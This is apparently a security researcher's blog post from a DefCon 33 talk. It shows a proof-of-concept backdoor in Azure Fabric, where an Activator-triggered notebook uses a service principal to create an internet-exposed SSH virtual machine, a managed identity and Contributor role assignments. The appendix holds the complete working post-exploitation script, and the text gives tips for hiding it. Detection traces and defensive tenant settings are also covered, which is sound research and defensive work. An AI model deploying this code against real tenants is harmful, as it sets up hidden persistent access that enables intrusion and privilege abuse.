Intro
In this blog post will discuss the creation of a backdoor access in Azure Fabric that was presented previously in Las Vegas at the DefCon 33 conference within the Cloud Village by Viktor Gazdag principal security consultant at NCC group.
A video of the talk can be viewed here:
Azure Fabric is a SaaS based end to end analytics platform that unifies tools and services such as Power BI, Data Lakehouse, data pipeline, Data Warehouse, Data Factory, databases etc into one portal. The main function of the platform is to ingest, process data by engineers applying arbitrary code on data and then build reports from it.
Proof of Concept Backdoor
Since the platform is designed for automated data manipulation that requires code execution, there are naturally multiple ways to execute code. These include places like pipeline, user defined function, Spark job and notebook. To introduce another angle and delay code execution to cover presence, a combination of a notebook and Activator is used to run Python code that creates the backdoor access.
Activator is an event detection and monitoring engine in Fabric that can automatically trigger actions when a condition is met. This service will monitor workspace events such as an item was successfully created or updated. There are additional Fabric events such as Job events, OneLake events and Azure Blob Storage events, but the proof of concept (PoC) backdoor will specifically look for workspace events that happened in one workspace.
A notebook is an interactive web-based environment that is capable of using different programming languages for data exploration, analyzation and transformation. One of the supported languages is Python. In addition, central public package repositories are also supported. The Azure Python SDK is in the public repository and will help and simplify the amount of code that is required to execute the post-exploitation steps. It is used to log in as a service principal with owner role on a resource group and manage resource in Azure subscription. The activities will include the creation of another service principal, a virtual machine with public IP address and assigned managed identity, plus a network security group allowing SSH from the Internet.
The PoC does not hide any of the code or the output, instead it prints out the virtual machine IP address, the root username with password and the managed identity name. The notebook allows hiding the input and output of the code, but with a click these can be easily revealed. One method to further hide the content is to create a package in wheel format from the code and upload it as a custom Python package that can be installed and then called within the notebook. Instead of printing the results in the logs, data can be sent to a controlled web server.
By default, the notebook is running in the name of the user. If you want to use managed identity or service principal, you have to enable and configure it. Fabric then takes care of the managed identity and its lifecycle. That means if you want to access and modify resources outside of Fabric then your user or managed identity requires additional permissions as well.
For the next sections, we will discuss the components of the backdoor and some of the details of how to use or what the Azure Python SDK is doing.
Components of The Backdoor
The service principal component is not strictly part of the backdoor as it is outside of Fabric, but it is required to create the virtual machine and other resources. You can look for and reuse existing service principals if they have the necessary permissions to create the resources you want. In this case, the service principal has owner role on the resource group itself.
It is possible to use an already available notebook that runs the Azure Python SDK code and then just add the code to it or creating a new one and bury it deep down in a folder structure. By default, the notebook is running in the name of the user who created. That’s the reason the code uses service principal with a role.
The executed code in the notebook is using Python and Azure Python SDK. It creates the following resources in an existing resource group: virtual network, subnet, network interface, virtual machine with Ubuntu Linux operating system, operating system login credentials for the virtual machine, disk, network security group, managed identity and service principal. It also registers providers if it is a first time the service was used. Some of the functions also requires waiting in to be finished, otherwise it will raise an exception. Furthermore, it will assign the contributor role both to the managed identity and service principal. The blog post will discuss more details with code examples to help understand how to use the SDK in a different section.
Activator is used for event monitoring and action execution. It looks for specific events if they happened and then trigger an action. The action can be sending an email, run a notebook or execute a Power Automate flow. Also worth mentioning that at the time of the research, there was at least 30 minutes of delay (based on observation) between the event of an item created and show up in the Activator monitoring menu. For the PoC we use all the workspace event items that happens in one specific workspace and then action will execute a notebook containing the backdoor code.
Lastly, permissions. The Contributor role on the workspace is the minimum required permission to create an Activator. Any additional Entra ID or Azure permissions are depending on the activities that the code is performing (key vault access, storage access, turn off logging etc). In this case an owner role at the resource group level for the service principal is required as user management and role assignment is done.
Usage of Azure Python SDK
In this section some parts of the code are discussed to help understand what and how to do things. The complete source code of the PoC is available at the end of the article. Also worth noting that the PoC code was generated using artificial intelligence, by a large language model (LLM) tool (Microsoft CoPilot) by applying iterations and tested in Azure test environment.
The Azure Python SDK helps creating and managing resources in Azure. One of the packages is the Azure Identity that helps with Entra ID authentication. Other packages from the SDK like azure-mgmt-compute or azure-mgmt-network are for easier resources creation such as virtual machine, virtual disk or network security group.
The following Azure Python SDK packages are installed with the !pip3 install command. This will locally install the Python package in the environment by opening an operating system shell:
!pip3 install azure-mgmt-msi !pip3 install azure-mgmt-authorization !pip3 install msrest !pip3 install azure-mgmt-common !pip3 install azure-mgmt-nspkg !pip3 install azure-mgmt-compute !pip3 install azure-mgmt-resource !pip3 install azure-mgmt-network !pip3 install azure-identity
Then classes are imported which then will be used for creating the various resources in Azure and Entra ID:
from azure.identity import ClientSecretCredential from azure.mgmt.msi import ManagedServiceIdentityClient from azure.mgmt.resource import ResourceManagementClient from azure.mgmt.compute import ComputeManagementClient from azure.mgmt.network import NetworkManagementClient from azure.mgmt.authorization import AuthorizationManagementClient from azure.mgmt.authorization.models import RoleAssignmentCreateParameters from azure.core.exceptions import HttpResponseError
As an example, the azure.identity class is used for creating the login credentials, while the azure.mgmt.compute class is responsible for creating the virtual machine resource.
The ClientSecretCredential class is used for creating the login credential object to log in with a service principal. This is important, because a different class is used for user login.
credential = ClientSecretCredential(
tenant_id=tenant_id,
client_id=client_id,
client_secret=client_secret
)
The values for each property are read from the environment variables in the operating system like this:
os.environ["AZURE_TENANT_ID"] = "TenantID" os.environ["AZURE_CLIENT_ID"] = "ClientID" os.environ["AZURE_CLIENT_SECRET"] = "Secret"
The credentials object is used in the different Azure clients like compute, network or managed service to create the resources itself. The following code snippet is an example of using a resource group or creating it if not exist:
try:
rg = resource_client.resource_groups.get(resource_group_name)
print(f"Using existing resource group: {resource_group_name}")
return rg
except HttpResponseError:
print(f"Creating resource group: {resource_group_name}")
return resource_client.resource_groups.create_or_update(
resource_group_name,
{"location": location}
The following code snippet shows how the network_client from the Azure Python SDK creates a network security group that allows SSH connection from the Internet to anyone if it does not exist:
def create_nsg(network_client, resource_group_name, location, nsg_name):
"""Create network security group with SSH access from the internet."""
try:
nsg = network_client.network_security_groups.get(resource_group_name, nsg_name)
print(f"Using existing NSG: {nsg_name}")
return nsg
except HttpResponseError:
print(f"Creating NSG: {nsg_name} with SSH access rule")
nsg_params = {
'location': location,
'security_rules': [
{
'name': 'AllowSSH',
'protocol': 'Tcp',
'source_port_range': '*',
'destination_port_range': '22',
'source_address_prefix': '*', # Allow from any source (internet)
'destination_address_prefix': '*',
'access': 'Allow',
'priority': 100,
'direction': 'Inbound',
'description': 'Allow SSH access from the internet'
}
]
}
return network_client.network_security_groups.begin_create_or_update(
resource_group_name,
nsg_name,
nsg_params
).result()
Traces Left Behind
Even though the backdoor can be hidden well in the notebook or in a new Spark environment, there are still traces left behind of its activity. The notebook has a history log of runs, shows when it run and what the output of the executed code was. In addition, every notebook has a resource explorer, which makes the additional 3rd party packages visible.
Spark environments have a configurable custom library where you can see the uploaded 3rd party packages and should be periodically reviewed. The same periodic review applies to all the Activator’s action. Although there is evidence that the Activator was changed or created, the event name is not explicitly telling this.
Reviewing and monitoring the subscription and resource group level IAM access and role assignment is a security best practice. This also means, the service principals are periodically reviewed whether they have the correct permissions and roles.
The Entra ID log contains the creation, modification and log in events of the service principals. This log can be also used in SIEM solutions to alert in any unauthorized modification or login.
Useful Fabric Settings
There are two tenant level and one workspace level settings that can help and make an attacker’s life harder in the post exploitation phase as well. These are the “Blocking Internet access”, “Private links for Azure Fabric” and “Workspace outbound access protection” options. The first one blocks all access from the Internet. While the second uses private endpoints for service communications. The last option is block the Internet access at the workspace level which will block the Internet access from the notebook, Spark job definitions, environments, shortcuts and lakehouses.
Conclusion
The Azure Python SDK is a useful collection of packages that can be used not just for legitimate automation, but for malicious activities. Post-exploitation activities by using built-in tools like the SDK or notebook can be harder to catch as they look like legitimate activities and use cases. Especially if execution is delayed like in this blog post.
Appendix A – Complete Code of Azure Fabric Backdoor
#!/usr/bin/env python
import os
import random
import string
from datetime import datetime, timedelta
from azure.identity import ClientSecretCredential
from azure.mgmt.msi import ManagedServiceIdentityClient
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.authorization import AuthorizationManagementClient
from azure.mgmt.authorization.models import RoleAssignmentCreateParameters
from azure.core.exceptions import HttpResponseError
# Service Principal credentials
os.environ["AZURE_TENANT_ID"] = "TenantID"
os.environ["AZURE_CLIENT_ID"] = "ClientID"
os.environ["AZURE_CLIENT_SECRET"] = "Secret"
os.environ["AZURE_SUBSCRIPTION_ID"] = "SubscriptionID"
os.environ["AZURE_RESOURCE_GROUP"] = "ResourceGroupName"
tenant_id = os.environ.get("AZURE_TENANT_ID", "your-tenant-id")
client_id = os.environ.get("AZURE_CLIENT_ID", "your-client-id")
client_secret = os.environ.get("AZURE_CLIENT_SECRET", "your-client-secret")
# Azure configuration
subscription_id = os.environ.get("AZURE_SUBSCRIPTION_ID", "your-subscription-id")
location = "eastus"
resource_group_name = "Fabric2"
# VM configuration
vm_name = "linux-demo-vm"
vm_username = "azureuser"
vm_password = "".join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(16))
managed_identity_name = "demo-msi"
# Role definition ID for Contributor role
contributor_role_id = "b24988ac-6180-42a0-ab88-20f7382dd24c"
def main():
# Create client credential
credential = ClientSecretCredential(
tenant_id=tenant_id,
client_id=client_id,
client_secret=client_secret
)
# Create clients
resource_client = ResourceManagementClient(credential, subscription_id)
msi_client = ManagedServiceIdentityClient(credential, subscription_id)
compute_client = ComputeManagementClient(credential, subscription_id)
network_client = NetworkManagementClient(credential, subscription_id)
auth_client = AuthorizationManagementClient(credential, subscription_id)
# Register required resource providers
register_providers(resource_client)
# Create or check resource group
create_resource_group(resource_client, resource_group_name, location)
# Create managed identity
identity = create_managed_identity(msi_client, resource_group_name, managed_identity_name, location)
print(f"Created managed identity: {identity.name} with ID: {identity.id}")
# Assign Contributor role to the managed identity
role_assignment = assign_role(
auth_client,
identity.principal_id,
contributor_role_id,
f"/subscriptions/{subscription_id}/resourceGroups/{resource_group_name}"
)
print(f"Assigned Contributor role to managed identity")
# Create network resources
vnet_name = f"{vm_name}-vnet"
subnet_name = "default"
nic_name = f"{vm_name}-nic"
ip_name = f"{vm_name}-ip"
nsg_name = f"{vm_name}-nsg"
vnet, subnet = create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name)
nsg = create_nsg(network_client, resource_group_name, location, nsg_name)
nic = create_nic(network_client, resource_group_name, location, nic_name, subnet.id, ip_name)
# Create Linux VM with managed identity
vm = create_linux_vm(
compute_client,
resource_group_name,
location,
vm_name,
nic.id,
vm_username,
vm_password,
identity.id
)
# Get the public IP address for SSH access
ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name)
print("\n" + "="*50)
print(f"DEPLOYMENT COMPLETED SUCCESSFULLY")
print("="*50)
print(f"VM Name: {vm_name}")
print(f"Username: {vm_username}")
print(f"Password: {vm_password}") # In production, use a more secure way to handle passwords
print(f"SSH Command: ssh {vm_username}@{ip_info.ip_address}")
print(f"Managed Identity: {managed_identity_name}")
print("="*50)
def register_providers(resource_client):
"""Register necessary Azure resource providers."""
providers_to_register = [
"Microsoft.ManagedIdentity",
"Microsoft.Compute",
"Microsoft.Network",
"Microsoft.Authorization"
]
for provider in providers_to_register:
print(f"Registering provider: {provider}")
resource_client.providers.register(provider)
# Note: Registration can take time to complete. In a production scenario,
# you might want to poll for completion.
def create_resource_group(resource_client, resource_group_name, location):
"""Create a resource group if it doesn't exist."""
try:
rg = resource_client.resource_groups.get(resource_group_name)
print(f"Using existing resource group: {resource_group_name}")
return rg
except HttpResponseError:
print(f"Creating resource group: {resource_group_name}")
return resource_client.resource_groups.create_or_update(
resource_group_name,
{"location": location}
)
def create_managed_identity(msi_client, resource_group_name, identity_name, location):
"""Create a user-assigned managed identity."""
try:
return msi_client.user_assigned_identities.get(resource_group_name, identity_name)
except HttpResponseError:
# Create the managed identity
identity = msi_client.user_assigned_identities.create_or_update(
resource_group_name,
identity_name,
{"location": location}
)
# Add a small delay to allow for replication
print("Waiting for managed identity to propagate...")
import time
time.sleep(30) # Wait 30 seconds for replication
return identity
def assign_role(auth_client, principal_id, role_definition_id, scope):
"""Assign role to the managed identity."""
# Generate a random UUID for the role assignment name
role_assignment_name = f"{principal_id}-{role_definition_id}"[:36]
role_assignment_params = RoleAssignmentCreateParameters(
role_definition_id=f"/subscriptions/{subscription_id}/providers/Microsoft.Authorization/roleDefinitions/{role_definition_id}",
principal_id=principal_id,
principal_type="ServicePrincipal" # Specify principal type to avoid replication delay issues
)
try:
return auth_client.role_assignments.create(
scope=scope,
role_assignment_name=role_assignment_name,
parameters=role_assignment_params
)
except HttpResponseError as e:
# If role assignment already exists, continue
if "already exists" in str(e):
print(f"Role assignment already exists for principal {principal_id}")
return None
raise
def create_vnet(network_client, resource_group_name, location, vnet_name, subnet_name):
"""Create virtual network and subnet."""
try:
vnet = network_client.virtual_networks.get(resource_group_name, vnet_name)
subnet = network_client.subnets.get(resource_group_name, vnet_name, subnet_name)
print(f"Using existing vnet: {vnet_name} and subnet: {subnet_name}")
return vnet, subnet
except HttpResponseError:
print(f"Creating vnet: {vnet_name} and subnet: {subnet_name}")
vnet_params = {
'location': location,
'address_space': {
'address_prefixes': ['10.0.0.0/16']
},
'subnets': [
{
'name': subnet_name,
'address_prefix': '10.0.0.0/24'
}
]
}
vnet = network_client.virtual_networks.begin_create_or_update(
resource_group_name,
vnet_name,
vnet_params
).result()
subnet = network_client.subnets.get(
resource_group_name,
vnet_name,
subnet_name
)
return vnet, subnet
def create_nsg(network_client, resource_group_name, location, nsg_name):
"""Create network security group with SSH access from the internet."""
try:
nsg = network_client.network_security_groups.get(resource_group_name, nsg_name)
print(f"Using existing NSG: {nsg_name}")
return nsg
except HttpResponseError:
print(f"Creating NSG: {nsg_name} with SSH access rule")
nsg_params = {
'location': location,
'security_rules': [
{
'name': 'AllowSSH',
'protocol': 'Tcp',
'source_port_range': '*',
'destination_port_range': '22',
'source_address_prefix': '*', # Allow from any source (internet)
'destination_address_prefix': '*',
'access': 'Allow',
'priority': 100,
'direction': 'Inbound',
'description': 'Allow SSH access from the internet'
}
]
}
return network_client.network_security_groups.begin_create_or_update(
resource_group_name,
nsg_name,
nsg_params
).result()
def create_nic(network_client, resource_group_name, location, nic_name, subnet_id, ip_name):
"""Create network interface with public IP and associate with NSG."""
try:
nic = network_client.network_interfaces.get(resource_group_name, nic_name)
print(f"Using existing NIC: {nic_name}")
return nic
except HttpResponseError:
print(f"Creating NIC: {nic_name} with public IP: {ip_name}")
# Create public IP
public_ip_params = {
'location': location,
'sku': {
'name': 'Standard'
},
'public_ip_allocation_method': 'Static',
'public_ip_address_version': 'IPv4'
}
public_ip = network_client.public_ip_addresses.begin_create_or_update(
resource_group_name,
ip_name,
public_ip_params
).result()
# Get NSG
nsg_name = f"{vm_name}-nsg"
try:
nsg = network_client.network_security_groups.get(resource_group_name, nsg_name)
except HttpResponseError:
# Create NSG if it doesn't exist
nsg = create_nsg(network_client, resource_group_name, location, nsg_name)
# Create NIC with NSG associated
nic_params = {
'location': location,
'ip_configurations': [
{
'name': 'ipconfig1',
'subnet': {
'id': subnet_id
},
'public_ip_address': {
'id': public_ip.id
}
}
],
'network_security_group': {
'id': nsg.id
}
}
nic = network_client.network_interfaces.begin_create_or_update(
resource_group_name,
nic_name,
nic_params
).result()
# Once NIC is created, print the public IP address for SSH access
ip_info = network_client.public_ip_addresses.get(resource_group_name, ip_name)
print(f"VM will be accessible via SSH at: {ip_info.ip_address}")
return nic
def create_linux_vm(compute_client, resource_group_name, location, vm_name, nic_id,
admin_username, admin_password, identity_id):
"""Create a Linux virtual machine with a managed identity attached."""
print(f"Creating VM: {vm_name}")
vm_params = {
'location': location,
'os_profile': {
'computer_name': vm_name,
'admin_username': admin_username,
'admin_password': admin_password,
'linux_configuration': {
'disable_password_authentication': False
}
},
'hardware_profile': {
'vm_size': 'Standard_DS1_v2'
},
'storage_profile': {
'image_reference': {
'publisher': 'Canonical',
'offer': 'UbuntuServer',
'sku': '18.04-LTS',
'version': 'latest'
},
'os_disk': {
'create_option': 'FromImage',
'managed_disk': {
'storage_account_type': 'Premium_LRS'
}
}
},
'network_profile': {
'network_interfaces': [
{
'id': nic_id,
'primary': True
}
]
},
'identity': {
'type': 'UserAssigned',
'user_assigned_identities': {
identity_id: {}
}
}
}
return compute_client.virtual_machines.begin_create_or_update(
resource_group_name,
vm_name,
vm_params
).result()
if __name__ == "__main__":
main()